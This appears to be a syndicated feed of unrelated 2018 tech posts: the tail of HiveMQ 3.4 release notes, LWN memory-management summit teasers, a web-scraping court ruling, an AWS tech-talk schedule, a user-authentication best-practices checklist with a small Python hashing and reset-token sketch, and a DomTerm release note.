The unique Trace Recordings functionality is without doubt a lifesaver when the behavior of individual MQTT clients needs further investigation, as all interactions with the broker can be traced — at runtime and at scale! Huge production deployments may accumulate multiple gigabytes of trace recordings. HiveMQ now offers a convenient way to collect all trace recordings from all nodes, zip them, and download the archive via a simple button on the WebUI. Remote debugging was never easier!

Additional Client Detail Information in WebUI

The mission of the HiveMQ WebUI is to provide easy insights to the whole production MQTT cluster for operators and administrators. Individual MQTT client investigations are a piece of cake, as all available information about clients can be viewed in detail. We further added the ability to view the restrictions a concrete client has:

  • Maximum Inflight Queue Size
  • Client Offline Queue Messages Size
  • Client Offline Message Drop Strategy

Session Invalidation

MQTT persistent sessions are one of the outstanding features of the MQTT protocol specification. Sessions that do not expire but are never reused unnecessarily consume disk space and memory. Administrators can now invalidate individual sessions directly in the HiveMQ WebUI for client sessions that can be deleted safely. HiveMQ 3.4 takes care of releasing the resources on all cluster nodes after a session is invalidated.

Web UI Polishing

Most texts on the WebUI were revisited and are now clearer and crisper. The help texts also received a major overhaul and should now be more, well, helpful. In addition, many small improvements were added, which are most of the time invisible but are there to help when you need them most. For example, the WebUI now displays a warning if cluster nodes with old versions are in the cluster (which may happen if a rolling upgrade was not finished properly).

Plugin System

One of the most popular features of HiveMQ is the extensive Plugin System, which enables the integration of HiveMQ with virtually any system and allows hooking into all aspects of the MQTT lifecycle. We listened to the feedback and are pleased to announce many improvements, big and small, for the Plugin System:

Client Session Time-to-live for individual clients

HiveMQ 3.3 offered a global configuration for setting the Time-To-Live for MQTT sessions. With the advent of HiveMQ 3.4, users can now programmatically set Time-To-Live values for individual MQTT clients and can discard an MQTT session immediately.

Individual Inflight Queues

While the Inflight Queue configuration is typically sufficient in the HiveMQ default configuration, there are some use cases that require the adjustment of this configuration. It’s now possible to change the Inflight Queue size for individual clients via the Plugin System.

Plugin Service Overload Protection

The HiveMQ Plugin System is a power-user tool, and it’s possible to make unbelievably useful modifications as well as to put major stress on the system as a whole if the programmer is not careful. In order to protect the HiveMQ instances from accidental overload, a Plugin Service Overload Protection can be configured. It rate limits the Plugin Service usage and gives feedback to the application programmer in case the rate limit is exceeded. This feature is disabled by default, but we strongly recommend updating your plugins to profit from it.

Session Attribute Store putIfNewer

This is one of the small bits you almost never need, but when you do, you’re ecstatic to have it. The Session Attribute Store now offers methods to put values only if the values you want to put are newer or fresher than the values already written. This is extremely useful if multiple cluster nodes want to write to the Session Attribute Store simultaneously, as it guarantees that outdated values can no longer overwrite newer values.

Disconnection Timestamp for OnDisconnectCallback

As the OnDisconnectCallback is executed asynchronously, the client might already be gone when the callback is executed. It’s now easy to obtain the exact timestamp at which an MQTT client disconnected, even if the callback is executed later on. This feature might be very interesting for many plugin developers in conjunction with the Session Attribute Store putIfNewer functionality.

Operations

We ❤️ Operators and we strive to provide all the tools needed for operating and administering an MQTT broker cluster at scale in any environment. A key strategy for successful operations of any system is monitoring. We added some interesting new metrics you might find useful.

System Metrics

In addition to JVM Metrics, HiveMQ now also gathers Operating System Metrics for Linux Systems. So HiveMQ is able to see for itself how the operating system views the process, including native memory, the real CPU usage, and open file usage. These metrics are particularly useful, if you don’t have a monitoring agent for Linux systems setup. All metrics can be found here.

Client Disconnection Metrics

The reality of many MQTT scenarios is that not all clients are able to disconnect gracefully by sending MQTT DISCONNECT messages. HiveMQ now also exposes metrics about clients that disconnected by closing the TCP connection instead of sending a DISCONNECT packet first. This is especially useful for monitoring if you regularly deal with clients that don’t have a stable connection to the MQTT brokers.

 

JMX enabled by default

JMX, the Java Management Extensions, is now enabled by default. Many HiveMQ operators use Application Performance Monitoring tools, which are able to hook into the metrics via JMX, or use plain JMX for on-the-fly debugging. While we recommend using official off-the-shelf plugins for monitoring, it’s now easier than ever to just use JMX if other solutions are not available to you.

Other notable improvements

The 3.4 release of HiveMQ is full of hidden gems and improvements. While it would be too much to highlight all small improvements, these notable changes stand out and contribute to the best HiveMQ release ever.

Topic Level Distribution Configuration

Our recommendation for all huge deployments with millions of devices is: Start with separate topic prefixes by bringing the dynamic topic parts directly to the beginning. The reality is that many customers have topics that are constructed like the following: “devices/{deviceId}/status”. So what happens is that all topics in this example start with a common prefix, “devices”, which is the first topic level. Unfortunately the first topic level doesn’t include a dynamic topic part. In order to guarantee the best scalability of the cluster and the best performance of the topic tree, customers can now configure how many topic levels are used for distribution. In the example outlined here, a topic level distribution of 2 would be perfect and guarantees the best scalability.

Mass disconnect performance improvements

Mass disconnections of MQTT clients can happen. This might be the case when e.g. a load balancer in front of the MQTT broker cluster drops the connections or if a mobile carrier experiences connectivity problems. Prior to HiveMQ 3.4, mass disconnect events caused stress on the cluster. Mass disconnect events are now massively optimized and even tens of millions of connection losses at the same time won’t bring the cluster into stress situations.


Replication Performance Improvements

Due to the distributed nature of HiveMQ, data needs to be replicated across the cluster on certain events, e.g. when cluster topology changes occur. There are various internal improvements in HiveMQ version 3.4 that increase the replication performance significantly. Our engineers put special love into the replication of Queued Messages, which is now faster than ever, even for multiple millions of Queued Messages that need to be transferred across the cluster.

Updated Native SSL Libraries

The Native SSL Integration of HiveMQ was updated to the newest BoringSSL version. This results in better performance and increased security. In case you’re using SSL and are not yet using the native SSL integration, we strongly recommend giving it a try; more than 40% performance improvement can be observed for most deployments.


Improvements for Java 9

While Java 9 was already supported for older HiveMQ versions, HiveMQ 3.4 has full-blown Java 9 support. The minimum Java version remains Java 7, although we strongly recommend using Java 8 or newer for the best performance of HiveMQ.

[$] Hotplugging and poisoning

Post Syndicated from corbet original https://lwn.net/Articles/753261/rss

Memory hotplugging is one of the least-loved areas of the memory-management
subsystem; there are many use cases for it, but nobody has taken ownership
of it. A similar situation exists for hardware page
poisoning, a somewhat neglected mechanism for dealing with memory errors.
At the 2018 Linux Storage, Filesystem, and Memory-Management summit, Michal
Hocko and Mike Kravetz dedicated a pair of brief memory-management track
sessions to problems that have been encountered in these subsystems, one of
which seems more likely to get the attention it needs than the other.

[$] Zone-lock and mmap_sem scalability

Post Syndicated from corbet original https://lwn.net/Articles/753269/rss

The memory-management subsystem is a central point that handles all of the
system’s memory, so it is naturally subject to scalability problems as
systems grow larger. Two sessions during the memory-management track of
the 2018 Linux Storage, Filesystem, and Memory-Management Summit looked at
specific contention points: the zone locks and the mmap_sem
semaphore.

[$] Improving support for large, contiguous allocations

Post Syndicated from corbet original https://lwn.net/Articles/753167/rss

Allocating chunks of memory that are both large and physically contiguous
has long been a difficult thing to do in the kernel. But there are times where
there is no alternative. Two sessions in the memory-management track of
the 2018 Linux Storage, Filesystem, and Memory-Management Summit explored
ways of making those allocations more reliable. It turns out that some use
cases have a rather larger value of “large” than others.

[$] Three sessions on memory control groups

Post Syndicated from corbet original https://lwn.net/Articles/753162/rss

Memory control groups allow the system administrator to impose memory-use
limits on the members of control groups. In many ways, these limits behave
like the overall limit on available memory, but there are also some
differences. The behavior of the memory controller also changed with the
advent of the version-2 control-group API, creating problems for at least
one significant user. Three sessions held in the memory-management track of
the Linux Storage, Filesystem, and Memory-Management Summit explored some
of these problems.

[$] The slab and protected-memory allocators

Post Syndicated from corbet original https://lwn.net/Articles/753154/rss

One of the core jobs of the memory-management subsystem is to make memory
available to other parts of the kernel when the need arises. The
memory-management track of the 2018 Linux Storage, Filesystem, and
Memory-Management Summit hosted a pair of sessions on new or improved
allocation functions for the kernel covering the slab allocators and
protectable memory.

[$] The LRU lock and mmap_sem

Post Syndicated from corbet original https://lwn.net/Articles/753058/rss

The kernel’s memory-management subsystem has to manage a great deal of
concurrency; that leads to an ongoing series of locking challenges that
sometimes seem intractable. Two recurring locking issues — the LRU locks
and the mmap_sem lock — were the topic of sessions held during the
memory-management track of the 2018 Linux Storage, Filesystem, and
Memory-Management Summit. In both cases, it quickly became clear that,
while some interesting ideas are being pursued, easy
solutions are not on offer.

[$] Heterogeneous memory management and MMU notifiers

Post Syndicated from corbet original https://lwn.net/Articles/752964/rss

Heterogeneous memory management (HMM) is a relatively new kernel subsystem
that allows the system to manage peripherals (such as graphics processors)
that have their own memory-management units. In two sessions during the
memory-management track of the 2018 Linux Storage,
Filesystem, and Memory-Management Summit, HMM creator Jérôme Glisse
provided an update on the status of this subsystem and where it is going,
along with a more detailed look at the memory-management unit (MMU)
notifiers mechanism on which it depends.

[$] Repurposing page->mapping

Post Syndicated from corbet original https://lwn.net/Articles/752564/rss

The page structure is one of the
most complex in the kernel due to the need to cram the maximum amount of
information into as little space as possible. Each field is so heavily
overloaded that developers prefer to avoid making changes to struct
page
if they can avoid
it. That didn’t deter Jérôme Glisse from proposing a significant change
during two plenary sessions at
the 2018 Linux Storage, Filesystem, and Memory-Management Summit, though.
There are some interesting benefits on offer, but getting there will not be
a simple task.

Data extraction (web scraping)

Post Syndicated from nellyo original https://nellyo.wordpress.com/2018/04/14/web-scraping/

According to a court in DC, using automated tools (“web scrapers”) to access publicly available information is not a computer crime. The case is Sandvig v. Sessions.

Researchers, computer specialists, and journalists want to use automated tools to access data online. Under some interpretations, the 1986 Computer Fraud and Abuse Act (CFAA) prohibits this. That is how the case ended up before the court; as the FCC reports:

The First Amendment to the Constitution protects not only the right to speak but also the right to receive information. The fact that “the plaintiff wishes to receive data from websites in an automated way, rather than recording the information by hand, does not change the conclusion.” Using automated tools is simply a technological advance that makes gathering information easier. It is not fundamentally different from using a recording device instead of taking written notes, or from using a smartphone’s panorama function instead of taking a series of photos from different positions, the court reasoned.

This is the second ruling to the same effect; before it, the court concluded that “a broad interpretation of the CFAA, if adopted, could have a profound effect on open access to the internet, which Congress could not have intended when it passed the law three decades ago.”

Last week the level of technological expertise of US senators was widely discussed, but judges do not have it easy either, judging by how they reach for comparisons with more familiar things. This made a strong impression years ago as well.

AWS Online Tech Talks – April & Early May 2018

Post Syndicated from Betsy Chernoff original https://aws.amazon.com/blogs/aws/aws-online-tech-talks-april-early-may-2018/

We have several upcoming tech talks in the month of April and early May. Come join us to learn about AWS services and solution offerings. We’ll have AWS experts online to help answer questions in real-time. Sign up now to learn more; we look forward to seeing you.

Note – All sessions are free and in Pacific Time.

April & early May — 2018 Schedule

Compute

April 30, 2018 | 01:00 PM – 01:45 PM PT – Best Practices for Running Amazon EC2 Spot Instances with Amazon EMR (300) – Learn about the best practices for scaling big data workloads, as well as how to process, store, and analyze big data securely and cost-effectively with Amazon EMR and Amazon EC2 Spot Instances.

May 1, 2018 | 01:00 PM – 01:45 PM PT – How to Bring Microsoft Apps to AWS (300) – Learn more about how to save significant money by bringing your Microsoft workloads to AWS.

May 2, 2018 | 01:00 PM – 01:45 PM PT – Deep Dive on Amazon EC2 Accelerated Computing (300) – Get a technical deep dive on how AWS’ GPU and FPGA-based compute services can help you to optimize and accelerate your ML/DL and HPC workloads in the cloud.

Containers

April 23, 2018 | 11:00 AM – 11:45 AM PT – New Features for Building Powerful Containerized Microservices on AWS (300) – Learn about how this new feature works and how you can start using it to build and run modern, containerized applications on AWS.

Databases

April 23, 2018 | 01:00 PM – 01:45 PM PT – ElastiCache: Deep Dive Best Practices and Usage Patterns (200) – Learn about Redis-compatible in-memory data store and cache with Amazon ElastiCache.

April 25, 2018 | 01:00 PM – 01:45 PM PT – Intro to Open Source Databases on AWS (200) – Learn how to tap the benefits of open source databases on AWS without the administrative hassle.

DevOps

April 25, 2018 | 09:00 AM – 09:45 AM PT – Debug your Container and Serverless Applications with AWS X-Ray in 5 Minutes (300) – Learn how AWS X-Ray makes debugging your Container and Serverless applications fun.

Enterprise & Hybrid

April 23, 2018 | 09:00 AM – 09:45 AM PT – An Overview of Best Practices of Large-Scale Migrations (300) – Learn about the tools and best practices on how to migrate to AWS at scale.

April 24, 2018 | 11:00 AM – 11:45 AM PT – Deploy your Desktops and Apps on AWS (300) – Learn how to deploy your desktops and apps on AWS with Amazon WorkSpaces and Amazon AppStream 2.0.

IoT

May 2, 2018 | 11:00 AM – 11:45 AM PT – How to Easily and Securely Connect Devices to AWS IoT (200) – Learn how to easily and securely connect devices to the cloud and reliably scale to billions of devices and trillions of messages with AWS IoT.

Machine Learning

April 24, 2018 | 09:00 AM – 09:45 AM PT Automate for Efficiency with Amazon Transcribe and Amazon Translate (200) – Learn how you can increase the efficiency and reach your operations with Amazon Translate and Amazon Transcribe.

April 26, 2018 | 09:00 AM – 09:45 AM PT Perform Machine Learning at the IoT Edge using AWS Greengrass and Amazon Sagemaker (200) – Learn more about developing machine learning applications for the IoT edge.

Mobile

April 30, 2018 | 11:00 AM – 11:45 AM PT – Offline GraphQL Apps with AWS AppSync (300) – Come learn how to enable real-time and offline data in your applications with GraphQL using AWS AppSync.

Networking

May 2, 2018 | 09:00 AM – 09:45 AM PT – Taking Serverless to the Edge (300) – Learn how to run your code closer to your end users in a serverless fashion. Also, David Von Lehman from Aerobatic will discuss how they used Lambda@Edge to reduce latency and cloud costs for their customers’ websites.

Security, Identity & Compliance

April 30, 2018 | 09:00 AM – 09:45 AM PT – Amazon GuardDuty – Let’s Attack My Account! (300) – Amazon GuardDuty Test Drive – Practical steps on generating test findings.

May 3, 2018 | 09:00 AM – 09:45 AM PT – Protect Your Game Servers from DDoS Attacks (200) – Learn how to use the new AWS Shield Advanced for EC2 to protect your internet-facing game servers against network layer DDoS attacks and application layer attacks of all kinds.

Serverless

April 24, 2018 | 01:00 PM – 01:45 PM PT – Tips and Tricks for Building and Deploying Serverless Apps In Minutes (200) – Learn how to build and deploy apps in minutes.

Storage

May 1, 2018 | 11:00 AM – 11:45 AM PT – Building Data Lakes That Cost Less and Deliver Results Faster (300) – Learn how Amazon S3 Select and Amazon Glacier Select increase application performance by up to 400% and reduce total cost of ownership by extending your data lake into cost-effective archive storage.

May 3, 2018 | 11:00 AM – 11:45 AM PT – Integrating On-Premises Vendors with AWS for Backup (300) – Learn how to work with AWS and technology partners to build backup & restore solutions for your on-premises, hybrid, and cloud native environments.

User Authentication Best Practices Checklist

Post Syndicated from Bozho original https://techblog.bozho.net/user-authentication-best-practices-checklist/

User authentication is functionality that every web application shares. We should have perfected it a long time ago, having implemented it so many times. And yet there are so many mistakes made all the time.

Part of the reason for that is that the list of things that can go wrong is long. You can store passwords incorrectly, you can have a vulnerable password reset functionality, you can expose your session to a CSRF attack, your session can be hijacked, etc. So I’ll try to compile a list of best practices regarding user authentication. The OWASP Top 10 is always something you should read, every year. But that might not be enough.

So, let’s start. I’ll try to be concise, but I’ll include as many of the related pitfalls as I can cover – e.g. what could go wrong with the user session after they log in:

  • Store passwords with bcrypt/scrypt/PBKDF2. No MD5 or SHA, as they are not good for password storage. A long salt (per user) is mandatory (the aforementioned algorithms have it built in). If you don’t, and someone gets hold of your database, they’ll be able to extract the passwords of all your users and then try these passwords on other websites. (See the sketch after this list.)
  • Use HTTPS. Period. (Otherwise user credentials can leak through unprotected networks). Force HTTPS if user opens a plain-text version.
  • Mark cookies as secure. Makes cookie theft harder.
  • Use CSRF protection (e.g. CSRF one-time tokens that are verified with each request). Frameworks have such functionality built-in.
  • Disallow framing (X-Frame-Options: DENY). Otherwise your website may be included in another website in a hidden iframe and “abused” through javascript.
  • Have a same-origin policy
  • Logout – let your users logout by deleting all cookies and invalidating the session. This makes usage of shared computers safer (yes, users should ideally use private browsing sessions, but not all of them are that savvy)
  • Session expiry – don’t have forever-lasting sessions. If the user closes your website, their session should expire after a while. “A while” may still be a big number depending on the service provided. For ajax-heavy website you can have regular ajax-polling that keeps the session alive while the page stays open.
  • Remember me – implementing “remember me” (on this machine) functionality is actually hard due to the risks of a stolen persistent cookie. Spring-security uses this approach, which I think should be followed if you wish to implement more persistent logins.
  • Forgotten password flow – the forgotten password flow should rely on sending a one-time (or expiring) link to the user and asking for a new password when it’s opened. Auth0 explains it in this post and Postmark gives some best practices. How the link is formed is a separate discussion and there are several approaches. Store a password-reset token in the user profile table and then send it as a parameter in the link. Or do not store anything in the database, but send a few params: userId:expiresTimestamp:hmac(userId+expiresTimestamp). That way you have expiring links (rather than one-time links); the HMAC relies on a secret key, so the links can’t be spoofed (see the sketch after this list). It seems there’s no consensus, as the OWASP guide has a bit different approach
  • One-time login links – this is an option used by Slack, which sends one-time login links instead of asking users for passwords. It relies on the fact that your email is well guarded and you have access to it all the time. If your service is not accessed too often, you can take that approach instead of (rather than in addition to) passwords.
  • Limit login attempts – brute-force through a web UI should not be possible; therefore you should block login attempts if they become too many. One approach is to just block them based on IP. The other one is to block them based on account attempted. (Spring example here). Which one is better – I don’t know. Both can actually be combined. Instead of fully blocking the attempts, you may add a captcha after, say, the 5th attempt. But don’t add the captcha for the first attempt – it is bad user experience.
  • Don’t leak information through error messages – you shouldn’t allow attackers to figure out if an email is registered or not. If an email is not found, upon login report just “Incorrect credentials”. On password reset, it may be something like “If your email is registered, you should have received a password reset email”. This is often at odds with usability – people don’t often remember the email they used to register, and the ability to check a number of them before getting in might be important. So this rule is not absolute, though it’s desirable, especially for more critical systems.
  • Make sure you use JWT only if it’s really necessary and be careful of the pitfalls.
  • Consider using a 3rd party authentication – OpenID Connect, OAuth by Google/Facebook/Twitter (but be careful with OAuth flaws as well). There’s an associated risk with relying on a 3rd party identity provider, and you still have to manage cookies, logout, etc., but some of the authentication aspects are simplified.
  • For high-risk or sensitive applications use 2-factor authentication. There’s a caveat with Google Authenticator though – if you lose your phone, you lose your accounts (unless there’s a manual process to restore it). That’s why Authy seems like a good solution for storing 2FA keys.
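
To make the password-storage and reset-link points above a bit more concrete, here is a minimal Python sketch. It assumes the bcrypt package plus the standard hmac library; the secret key, user IDs, and expiry window are placeholders, and a real implementation has to fit your framework’s user model and storage.

import base64
import hashlib
import hmac
import time

import bcrypt  # pip install bcrypt

SECRET_KEY = b"replace-with-a-real-secret"  # placeholder; keep it out of source control


# Password storage: bcrypt generates and embeds a per-user salt automatically.
def hash_password(password: str) -> bytes:
    return bcrypt.hashpw(password.encode("utf-8"), bcrypt.gensalt())


def check_password(password: str, stored_hash: bytes) -> bool:
    return bcrypt.checkpw(password.encode("utf-8"), stored_hash)


# Expiring, stateless reset links: userId:expiresTimestamp:hmac(userId+expiresTimestamp)
def make_reset_token(user_id: str, ttl_seconds: int = 3600) -> str:
    expires = str(int(time.time()) + ttl_seconds)
    mac = hmac.new(SECRET_KEY, f"{user_id}:{expires}".encode(), hashlib.sha256).digest()
    return f"{user_id}:{expires}:{base64.urlsafe_b64encode(mac).decode()}"


def verify_reset_token(token: str):
    user_id, expires, mac_b64 = token.split(":")
    expected = hmac.new(SECRET_KEY, f"{user_id}:{expires}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(base64.urlsafe_b64decode(mac_b64), expected):
        return None  # spoofed or corrupted link
    if int(expires) < time.time():
        return None  # link expired
    return user_id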

I’m sure I’m missing something. And you see it’s complicated. Sadly we’re still at the point where the most common functionality – authenticating users – is so tricky and cumbersome, that you almost always get at least some of it wrong.

The post User Authentication Best Practices Checklist appeared first on Bozho's tech blog.

DomTerm 1.0 released

Post Syndicated from ris original https://lwn.net/Articles/750319/rss

Per Bothner has released DomTerm 1.0. Since DomTerm was covered
here
in January 2016, many features have been added or enhanced. (See
this article
on opensource.com.)
DomTerm is a mostly-xterm-compatible terminal emulator, but the output can
be graphics, rich text, and other html, so it is suitable as a REPL for a
program like gnuplot.
Other major features include screen/tmux-style tiling and detachable
sessions, readline-style input editing (integrated with mouse and
clipboard), and opening an editor when clicking an error message.